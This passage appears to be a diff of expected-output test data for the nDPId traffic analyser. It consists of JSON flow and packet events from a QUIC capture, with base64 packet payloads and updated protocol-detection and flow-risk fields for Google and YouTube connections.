 02231{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":416,"source":"quic.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1461850699901,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1461850699901,"pkt":"OGO7P47K7LHXhMJyCABFAAViIsFAAEAR\/sMKAAAECgAAA5zGF+kFThlmCfresOVX5pKgUTAzMwNQcq6EZWnphcq9nqEAoAEUBUNITE8NAAAAUEFEAEwEAABWRVIAUAQAAENDUwBgBAAATVNQQ2QEAABQRE1EaAQAAElDU0xsBAAAQ1RJTXQEAABOT05QlAQAAFNDTFOYBAAAQ1NDVJgEAABDT1BUnAQAAENGQ1egBAAAU0ZDV6QEAAAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLVEwMzN7Junn5Fxx\/wHogWCSkhroZAAAAFg1MDlYAgAASxIiVwAAAADS+1vXZRZzJ1+rqmPJtznpSW1g7BCg2rfC01sXLNMkHQEAAABGSVhEAEAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00730{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":420,"source":"quic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1461850699450,"flow_last_seen":1461850703450,"flow_idle_time":180000,"flow_min_l4_payload_len":70,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":6820,"flow_avg_l4_payload_len":1136,"midstream":0,"ts_msec":1463060980301,"l3_proto":"ip4","src_ip":"10.0.0.4","dst_ip":"10.0.0.3","src_port":40134,"dst_port":6121,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port","24":"SNI TLS extension was missing"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00919{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":420,"source":"quic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1461850699450,"flow_last_seen":1461850703450,"flow_idle_time":180000,"flow_min_l4_payload_len":70,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":6820,"flow_avg_l4_payload_len":1136,"midstream":0,"ts_msec":1463060980301,"l3_proto":"ip4","src_ip":"10.0.0.4","dst_ip":"10.0.0.3","src_port":40134,"dst_port":6121,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":420,"source":"quic.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980301,"flow_last_seen":1463060980301,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1463060980301,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"172.217.16.4","src_port":45669,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02240{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":420,"source":"quic.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1463060980301,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1463060980301,"pkt":"8IQvSpdgeJKcD6iOCABFAAViG\/5AAEARmp7AqAFprNkQBLJlAbsFTr+DDUPl1BjSnP0KUTAyNQFyZIfG66V5bj99kfIBoAEABENITE8XAAAAUEFEAIgBAABTTkkAlgEAAFNUSwDQAQAAVkVSANQBAABDQ1MA5AEAAE5PTkMEAgAATVNQQwgCAABBRUFEDAIAAFVBSUQsAgAAU0NJRDwCAABUQ0lEQAIAAFBETUREAgAAU1JCRkgCAABJQ1NMTAIAAFBVQlNsAgAAU0NMU3ACAABLRVhTdAIAAENPUFR4AgAAQ0NSVJACAABJUlRUlAIAAENFVFY4AwAAQ0ZDVzwDAABTRkNXQAMAAC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0td3d3Lmdvb2dsZS5jb21PyGNIiSYlWYMNKJNAlwv39ix54lRFVA6paRsUl4FQy0hWHom6FQQ9JcZPH9joUxX+SDLF1j\/DSdX0UTAyNXsm6efkXHH\/AeiBYJKSGuhXNIn06ylDo5Ug9+nOea5qJJts1jMXRdJCxw2QvK85nmQAAABDQzIwQ2hyb21lLzQ5LjAuMjYyMy44NyBMaW51eCB4ODZfNjQarjm3cTKFpJVCrT7eADgKAAAAAFg1MDkAABAAHgAAAMpYWB84oseWX+q27ipmj\/RQLfsZQqQtGKexDF79uuJfAQAAAEMyNTVGSVhEVe9eTSHF9WXiYxqCfXGFX0ALe5Cprnnr7MUAAJJnZtEbkxP245vVr56GfjMCMAwif3n\/lWOThmdSnoedzP2jx+7ZPMWRBUv\/hZavd3FPUhQwHHwpvJJDzRcoSGYXtOQyhcYCVpGlxHD65Db8HFfgEKEx\/YlE\/aFaPqB1XqWWzf4zDCgIc\/Djzy4R\/py4JVjfq9V0ooIkHbH+8mAcpgdNt3gj0SeICAOM6wnOXFVXQaU2KKd\/llBTkdtTIS8p4UckAADwAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00721{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":420,"source":"quic.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980301,"flow_last_seen":1463060980301,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1463060980301,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"172.217.16.4","src_port":45669,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.com","user_agent":"Chrome\/49.0.2623.87 Linux x86_64"}}
+00747{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":420,"source":"quic.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980301,"flow_last_seen":1463060980301,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1463060980301,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"172.217.16.4","src_port":45669,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"www.google.com","user_agent":"Chrome\/49.0.2623.87 Linux x86_64"}}
 00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":421,"source":"quic.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980313,"flow_last_seen":1463060980313,"flow_idle_time":180000,"flow_min_l4_payload_len":120,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":120,"midstream":0,"ts_msec":1463060980313,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"172.217.16.3","src_port":40461,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00589{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":421,"source":"quic.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1463060980313,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":162,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":162,"pkt_l4_len":128,"ts_msec":1463060980313,"pkt":"8IQvSpdgeJKcD6iOCABFAACUtgVAAEARBWbAqAFprNkQA54NAbsAgHEsDKM2rKXAEd7wIt3qCq5m3TavpAsTDbAsFGxmQjrMNGgPLp5\/67eBvHP3BJ3FiMAS4anKHt6qD2LZa9lkPD+xi9VHkCY0QuwL2qSbKNzU+YmHNEsRyVDptUSV5HeCE\/peVLnXWfr\/zBYlTVvhdUjE1rsevsCPj6RN"}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":422,"source":"quic.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980336,"flow_last_seen":1463060980336,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1463060980336,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.238","src_port":34438,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02236{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"quic.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1463060980336,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1463060980336,"pkt":"8IQvSpdgeJKcD6iOCABFAAVieqhAAEARTajAqAFp2DrS7oaGAbsFThSMDaSWOQdzcSypUTAyNQHV5wqJLuvacsEa2ggBoAEABENITE8XAAAAUEFEAFEBAABTTkkAYAEAAFNUSwDQAQAAVkVSANQBAABDQ1MA5AEAAE5PTkMEAgAATVNQQwgCAABBRUFEDAIAAFVBSUQsAgAAU0NJRDwCAABUQ0lEQAIAAFBETUREAgAAU1JCRkgCAABJQ1NMTAIAAFBVQlNsAgAAU0NMU3ACAABLRVhTdAIAAENPUFR4AgAAQ0NSVJACAABJUlRUlAIAAENFVFY4AwAAQ0ZDVzwDAABTRkNXQAMAAC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS13d3cueW91dHViZS5jb205fPBATCqFxnBl7Xv68Z9fD9Nmah0fi4FMd4fkZ11E\/CzEloDogZdL\/nncpFiRZ2yDvER3hyJLRuKPu2yNKulWJLAj1kd1TL1O1ht+4DYSFzHaxW1I0SXh61LEyPn0ZJNHzIO4+v+uSwxJi411oZGLUTAyNXsm6efkXHH\/AeiBYJKSGuhXNIn0IqnIQgaTDzQq3tVtNNLVAtwTevP964BOlEvwfGQAAABDQzIwQ2hyb21lLzQ5LjAuMjYyMy44NyBMaW51eCB4ODZfNjSzHyexPo2T9WCZD4U6m8alAAAAAFg1MDkAABAAHgAAAGluEpDbken\/KU7Y\/ELsDAQ\/jJay9FDlf0UZ5YuPrPZyAQAAAEMyNTVGSVhEVe9eTSHF9WXiYxqCfXGFX0ALe5CprnnrcNABADyUl7\/h6mDtG4NsOVvVuJ1PZcqwDa87DQJ80CEFy8NfQNViwNoS56F6e843IHdgyXgGBymFoVuWTPeBJJ3oxBn7RKC7ZZ3lBjoLLbk9XTVRW+SbaYvzMJPMbCMtrqm0FX1EDkyftTNYRo2oN8jHq308RLDWGOdHHpxuN7oxivKsZVduus4FvpUAikTROVWqLCaDklpl4qgg4HMAiksVv2oDrqCwAADwAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00720{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":422,"source":"quic.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980336,"flow_last_seen":1463060980336,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1463060980336,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.238","src_port":34438,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"www.youtube.com","user_agent":"Chrome\/49.0.2623.87 Linux x86_64"}}
+00746{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":422,"source":"quic.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980336,"flow_last_seen":1463060980336,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1463060980336,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.210.238","src_port":34438,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"www.youtube.com","user_agent":"Chrome\/49.0.2623.87 Linux x86_64"}}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":423,"source":"quic.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980349,"flow_last_seen":1463060980349,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1463060980349,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.214.110","src_port":48445,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02237{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":423,"source":"quic.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1463060980349,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1463060980349,"pkt":"8IQvSpdgeJKcD6iOCABFAAViOWpAAEARi2bAqAFp2DrWbr09AbsFTixPDZgh\/ntZ+3x4UTAyNQEexu19QA91RUfxOasBoAEABENITE8XAAAAUEFEAD0BAABTTkkASAEAAFNUSwDQAQAAVkVSANQBAABDQ1MA5AEAAE5PTkMEAgAATVNQQwgCAABBRUFEDAIAAFVBSUQsAgAAU0NJRDwCAABUQ0lEQAIAAFBETUREAgAAU1JCRkgCAABJQ1NMTAIAAFBVQlNsAgAAU0NMU3ACAABLRVhTdAIAAENPUFR4AgAAQ0NSVJACAABJUlRUlAIAAENFVFY4AwAAQ0ZDVzwDAABTRkNXQAMAAC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0taS55dGltZy5jb20wbVd\/xJG3uBvID0WAK+ohpx7cyOJ2dtebsPJwjywjfFuGDbC64HOW7daWVAssjrQthDJVGy+I6s+aKoR7mAYJDhdEEUKOBhWT8KdUZ+QsCFwZeIYkra13fPULR+kjxZwRpLY7sCam2MMIw19PW15Bf2xgAD\/plCBqG73f91yMrvU7pcyTjshGUTAyNXsm6efkXHH\/AeiBYJKSGuhXNIn0h3jC79n8KmTTqLGBqNDsO\/+yFOWZXiuGsfLkAWQAAABDQzIwQ2hyb21lLzQ5LjAuMjYyMy44NyBMaW51eCB4ODZfNjS7Vl7XCOzOLURPKzlhG40eAAAAAFg1MDkAABAAHgAAAFNDC7W8XmRlWw2IWugDdRStg\/GKmfFye59SXxQJoGstAQAAAEMyNTVGSVhEVe9eTSHF9WXiYxqCfXGFX0ALe5CprnnrbhIBAFhkMdLsvVn8dBclelTniFgmv7sivZhjmekneMr+6hkdFDGQb\/mkcgr5pmlxB2Adl4UO+Q5ZRPsivx7E2pdvMReaoISz1dlKFlGYuAatdBRMcJaEN+iNYNqPa0KmC4oIMq310RgCpJw2LDB3pVyVeASJBnCusnfTUVrGDsYCI0tVvwmaJscLHqtT1URTpBOCGDqnTS9VwZ\/TQa7YakZ29aLWPRkUAADwAAAAYAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
-00716{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":423,"source":"quic.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980349,"flow_last_seen":1463060980349,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1463060980349,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.214.110","src_port":48445,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"i.ytimg.com","user_agent":"Chrome\/49.0.2623.87 Linux x86_64"}}
+00742{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":423,"source":"quic.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980349,"flow_last_seen":1463060980349,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1463060980349,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.214.110","src_port":48445,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"i.ytimg.com","user_agent":"Chrome\/49.0.2623.87 Linux x86_64"}}
 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":424,"source":"quic.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1463060980356,"flow_last_seen":1463060980356,"flow_idle_time":180000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"ts_msec":1463060980356,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"216.58.201.227","src_port":40030,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02230{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"quic.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1463060980356,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"ts_msec":1463060980356,"pkt":"8IQvSpdgeJKcD6iOCABFAAViY+ZAAEARbXXAqAFp2DrJ45xeAbsFTrsoDSo6NO9En0amUTAyNQHxQPc0oXq52GqfzEUBoAEUBUNITE8PAAAAUEFEACcEAABTTkkAOAQAAFZFUgA8BAAAQ0NTAEwEAABNU1BDUAQAAFVBSURwBAAAVENJRHQEAABQRE1EeAQAAFNSQkZ8BAAASUNTTIAEAABTQ0xThAQAAENPUFSIBAAASVJUVIwEAABDRkNXkAQAAFNGQ1eUBAAALS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t